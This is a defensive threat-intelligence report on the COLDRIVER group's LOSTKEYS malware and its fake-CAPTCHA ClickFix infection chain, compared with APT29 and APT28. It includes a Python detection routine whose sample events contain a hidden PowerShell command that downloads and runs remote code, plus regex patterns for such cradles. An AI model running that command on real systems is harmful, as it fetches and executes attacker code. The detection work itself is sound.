LOSTKEYS: COLDRIVER’s Next-Gen Social Engineering Malware and the Evolution of Russian State Espionage Tactics

Suggested Pivot

How effective is the multi-stage social engineering infection chain of LOSTKEYS, particularly the fake CAPTCHA lure and ClickFix PowerShell execution, compared to APT29’s spear-phishing and supply chain compromises (e.g., SolarWinds in 2020) and APT28’s exploitation of network devices, in evading current endpoint detection and response (EDR) solutions deployed in 2025 campaigns?


TL;DR

Key Points

    • LOSTKEYS is a newly identified malware attributed to Russia’s FSB-linked COLDRIVER group, leveraging advanced social engineering (fake CAPTCHA lures) and multi-stage PowerShell/VBS payloads for stealthy espionage.
    • Organizations must deploy advanced EDR solutions with script anomaly detection and enforce strict application whitelisting to counter this evolving threat.
    • Comparative analysis shows LOSTKEYS diverges from APT29 and APT28 by prioritizing user-driven infection chains and device evasion, while APT29/28 continue to exploit supply chains, network devices, and credential theft.
    • Detection strategies should focus on behavioral analytics, unique IOCs (e.g., display resolution checks), and rapid patch management.
    • Russian APTs are increasingly blending technical sophistication with innovative delivery and evasion, targeting Western governments, NGOs, and diplomatic sectors.
    • Cross-sector threat intelligence sharing and regular security awareness training are critical for resilience.
    • The full scope of LOSTKEYS’ capabilities and operational collaboration between Russian APTs remains uncertain, requiring ongoing monitoring and research.
    • Organizations should prioritize YARA signature development and red team exercises simulating advanced social engineering.

Executive Summary

LOSTKEYS, first observed in early 2025, marks a significant evolution in Russian cyber-espionage, attributed to the FSB-backed COLDRIVER group. Unlike traditional spear-phishing, LOSTKEYS employs a sophisticated multi-stage infection chain initiated by fake CAPTCHA lure websites (ClickFix), prompting users to execute obfuscated PowerShell and VBS scripts. This approach bypasses standard email and endpoint defenses, enabling selective file theft and system reconnaissance while evading detection through device fingerprinting (e.g., display resolution checks).

In contrast, APT29 (SVR) and APT28 (GRU) continue to leverage spear-phishing, supply chain attacks (e.g., SolarWinds), and network device exploitation, with modular malware platforms and persistent credential theft. LOSTKEYS’ operational focus is on Western governments, NGOs, and diplomatic entities, aligning with broader Russian state espionage objectives.

Technical analysis reveals LOSTKEYS’ unique persistence (per-infection keys, script-based payloads), C2 via hardcoded IPs/domains, and advanced evasion. Detection and mitigation require advanced EDR with script anomaly detection, strict application whitelisting, rapid patching, and MFA. Security awareness training targeting social engineering vectors is essential, especially for high-risk sectors.

Strategically, Russian APTs are expected to further integrate social engineering, supply chain, and infrastructure exploits, with increasing collaboration and tool sharing. The speculative nature of LOSTKEYS’ full capabilities and the extent of inter-APT cooperation necessitate ongoing research, YARA signature development, and red team exercises. Cross-sector intelligence sharing and investment in behavioral analytics platforms are recommended to counter these adaptive threats.


Research

Attribution

Origin

LOSTKEYS malware is attributed to the Russian government-backed threat group COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto), linked to Russia's Federal Security Service (FSB). First observed in early 2025, LOSTKEYS represents a new development in COLDRIVER's toolset. COLDRIVER is known for credential phishing and targeted espionage against NATO governments, NGOs, former intelligence officers, and individuals connected to Ukraine.

APT29 (Cozy Bear) is attributed to Russia's Foreign Intelligence Service (SVR) and has been active since at least 2008. It is known for sophisticated cyber-espionage campaigns, including the SolarWinds supply chain attack.

APT28 (Fancy Bear) is linked to Russia's military intelligence agency (GRU) and has been active since at least 2007. It focuses on cyber-espionage targeting governments, militaries, and security organizations.

Motivation

LOSTKEYS and the toolsets of APT29 and APT28 all serve Russian state-sponsored cyber-espionage objectives, focusing on intelligence collection to support geopolitical and strategic interests. Targets include government, military, diplomatic, and NGO sectors.

Historical Context

LOSTKEYS is a recent malware strain marking an evolution in Russian espionage tactics, emphasizing social engineering and stealthy data theft. COLDRIVER has a history of credential phishing and selective malware deployment (e.g., SPICA in 2024).

APT29 has a long history of advanced cyber-espionage, evolving from spear-phishing to supply chain attacks and cloud environment targeting. Its malware families include CosmicDuke, CozyDuke, and SUNBURST.

APT28 has evolved from spear-phishing to exploiting network infrastructure vulnerabilities and conducting disruptive operations. Its malware includes Zebrocy, X-Tunnel, and MASEPIE.

Timeline

  • APT28 active since at least 2007.
  • APT29 active since at least 2008.
  • LOSTKEYS first observed in early 2025.
  • COLDRIVER campaigns with LOSTKEYS observed in January, March, and April 2025.
  • APT29's SolarWinds attack occurred in 2020.

Countries Targeted

  1. United States – Primary target for espionage and intelligence.
  2. Western European countries (e.g., Germany, UK) – Frequent targets of APT28 and APT29.
  3. Ukraine – Targeted in geopolitical conflict.
  4. NATO member states – Strategic intelligence targets.
  5. NGOs and international organizations – Targeted by LOSTKEYS and COLDRIVER.

Sectors Targeted

  1. Government and Military – Primary focus for espionage.
  2. Diplomatic and Foreign Affairs – Political intelligence targets.
  3. NGOs – Sensitive information targets.
  4. Technology and Telecommunications – Infrastructure access.
  5. Media and Journalism – Information gathering.

Associated Malware Families

  • LOSTKEYS is linked to COLDRIVER, which also uses SPICA malware.
  • APT29 malware families include CosmicDuke, CozyDuke, OnionDuke, SeaDuke, Hammertoss, CloudDuke, PowerDuke, POSHSPY, and SUNBURST.
  • APT28 malware includes Zebrocy, X-Tunnel, MASEPIE, and others targeting network devices.

Similar Malware

  • LOSTKEYS shares operational features with other Russian espionage malware, such as selective file theft and system information exfiltration.
  • APT29 malware is known for modularity, stealth, and advanced persistence mechanisms.
  • APT28 malware is characterized by aggressive reconnaissance, exploitation of network devices, and credential theft.

Threat Actors

  • COLDRIVER (Cold River) is a Russian FSB-linked group behind LOSTKEYS.
  • APT29 (Cozy Bear) is SVR-linked, known for sophisticated espionage.
  • APT28 (Fancy Bear) is GRU-linked, known for aggressive cyber operations.

Breaches Involving This Malware

  • LOSTKEYS involved in 2025 espionage campaigns targeting Western advisers, NGOs, and journalists.
  • APT29 responsible for the 2020 SolarWinds supply chain breach and 2024 TeamViewer corporate network breach.
  • APT28 linked to breaches of German government entities, Ukrainian targets, and NATO-related organizations.

Technical and Operational Comparative Analysis

Delivery and Initial Access

  • LOSTKEYS uses a multi-stage infection chain starting with a fake CAPTCHA lure website prompting users to execute PowerShell commands (ClickFix technique). This social engineering tactic is designed to bypass traditional email filters and endpoint protections.
  • APT29 primarily uses spear-phishing with malicious attachments or links, supply chain compromises (e.g., SolarWinds), and exploitation of public-facing applications.
  • APT28 relies heavily on spear-phishing, exploitation of network devices (e.g., Cisco routers), and, more recently, novel Wi-Fi "nearest neighbor" attacks for initial access.

Persistence Mechanisms

  • LOSTKEYS uses PowerShell and Visual Basic Script (VBS) payloads with unique keys per infection chain for obfuscation and persistence.
  • APT29 employs scheduled tasks, registry run keys, WMI event subscriptions (e.g., POSHSPY backdoor), and web shells on compromised servers.
  • APT28 uses malware variants that establish persistence via backdoors, credential theft, and exploitation of network infrastructure.

Command and Control (C2)

  • LOSTKEYS retrieves stages and final payloads from hardcoded IP addresses and domains, using unique identifiers per infection chain to evade detection.
  • APT29 uses a variety of C2 techniques including standard application layer protocols, custom cryptographic protocols, domain fronting, and data encoding.
  • APT28 uses C2 infrastructure embedded in compromised routers and network devices, often leveraging known vulnerabilities.

Evasion Techniques

  • LOSTKEYS includes device evasion by checking display resolution hashes to avoid execution in virtual machines.
  • APT29 uses obfuscation, file deletion, indicator removal, and encrypted communications to evade detection.
  • APT28 employs code obfuscation, use of legitimate system tools, and exploitation of zero-day vulnerabilities.

Operational Behavior

  • LOSTKEYS focuses on selective file theft from hardcoded directories, system information gathering, and process enumeration.
  • APT29 conducts long-term espionage with modular malware platforms capable of downloading arbitrary modules and executing complex commands.
  • APT28 combines espionage with disruptive operations, credential theft, and network reconnaissance.

Evolution of Russian Cyber-Espionage Tactics

  • The emergence of LOSTKEYS reflects a trend toward more sophisticated social engineering combined with multi-stage, obfuscated malware delivery.
  • APT29 has evolved from spear-phishing to complex supply chain and cloud environment attacks, emphasizing stealth and persistence.
  • APT28 has expanded from phishing to exploiting network infrastructure and physical proximity attacks, increasing operational reach and impact.
  • Russian cyber-espionage tactics have become more adaptive, blending technical sophistication with innovative delivery and evasion methods.

Best Practices for Detection, Mitigation, and Organizational Resilience

Detection

  • Deploy advanced endpoint detection and response (EDR) tools capable of detecting PowerShell and VBS script execution anomalies.
  • Monitor network traffic for unusual connections to known C2 IPs and domains associated with LOSTKEYS, APT29, and APT28.
  • Implement heuristic and behavioral analytics to detect suspicious user activity, such as unusual file access or credential use.
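As an added illustration of the script-anomaly and C2-monitoring points above (example code written for this page, not taken from the report or any vendor product), the following Python triage routine scores constructed process-creation events for the ClickFix pattern the report describes: a script host spawned straight from the user's shell, download-cradle or hide/bypass switches on the command line, and references to watchlisted C2 indicators. The event field names, the explorer.exe parent heuristic (assuming the Run-dialog variant of the lure), and the watchlist values are assumptions.

```python
import re
# Constructed watchlist standing in for a real IOC feed (placeholders, not real infrastructure).
C2_WATCHLIST = {"203.0.113.10", "stage-host.invalid"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# A command a lured user pastes into the Run dialog is spawned by explorer.exe.
USER_SHELL_PARENTS = {"explorer.exe"}
# Download cradles and hide/bypass switches typical of multi-stage script loaders.
CRADLE_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|invoke-expression|\biex\b"
                       r"|-enc\w*|-w\w* hidden|-e\w* bypass", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (score, reasons) for one process-creation event (assumed field names)."""
    reasons = []
    if basename(ev["image"]) not in SCRIPT_HOSTS:
        return 0, reasons
    cmd = ev["command_line"]
    if basename(ev["parent_image"]) in USER_SHELL_PARENTS:
        reasons.append("script host launched directly from the user shell (ClickFix pattern)")
    hits = sorted({m.lower() for m in CRADLE_RE.findall(cmd)})
    if hits:
        reasons.append("download/obfuscation switches: " + ", ".join(hits))
    if any(ioc in cmd for ioc in C2_WATCHLIST):
        reasons.append("command line references a watchlisted C2 indicator")
    return len(reasons), reasons

def triage(events, threshold=2):
    # Events scoring at or above threshold as (score, pid, reasons), highest first.
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append((score, ev["pid"], reasons))
    return sorted(flagged, reverse=True)

SAMPLE_EVENTS = [  # constructed events, not captured telemetry
    {"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -ep bypass -c "iex (iwr http://203.0.113.10/s1)"'},
    {"pid": 4133, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
    {"pid": 4150, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"wscript.exe C:\Users\alice\Downloads\invoice.vbs"},
    {"pid": 4160, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "chrome.exe --no-first-run"},
]
```

A single weak signal (the VBS launched from explorer.exe) stays below the threshold, while the lure-style PowerShell launch combining all three signals is the only event triage returns.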

Mitigation

  • Enforce strict application whitelisting and least privilege policies to prevent unauthorized script execution.
  • Regularly patch and update all software and network devices to close known vulnerabilities exploited by APT28 and APT29.
  • Use multi-factor authentication (MFA) to reduce the risk of credential theft leading to lateral movement.

Organizational Resilience

  • Conduct regular security awareness training focusing on social engineering tactics like fake CAPTCHAs and spear-phishing.
  • Develop and test incident response plans tailored to espionage malware scenarios, including rapid containment and forensic analysis.
  • Engage in threat intelligence sharing with government and industry partners to stay informed on emerging threats and indicators of compromise.

Strategic Implications

  • These malware families pose significant risks to national security, diplomatic relations, and organizational reputation due to their targeting of sensitive government and NGO sectors.
  • Persistent espionage campaigns can lead to loss of intellectual property, exposure of confidential communications, and erosion of trust in critical institutions.
  • Strategic decision makers should prioritize investments in detection capabilities, cross-sector collaboration, and proactive threat hunting to mitigate these risks.

Explicit Uncertainties and Gaps

  • LOSTKEYS is a recently identified malware with limited public technical details; some aspects of its full capabilities and variants remain unclear.
  • Attribution to COLDRIVER is based on observed TTPs and infrastructure overlaps but may evolve with further intelligence.
  • The interplay and potential tool sharing between COLDRIVER and other Russian APT groups require ongoing monitoring.
  • The full scope of breaches involving LOSTKEYS is not yet fully disclosed, limiting comprehensive impact assessment.
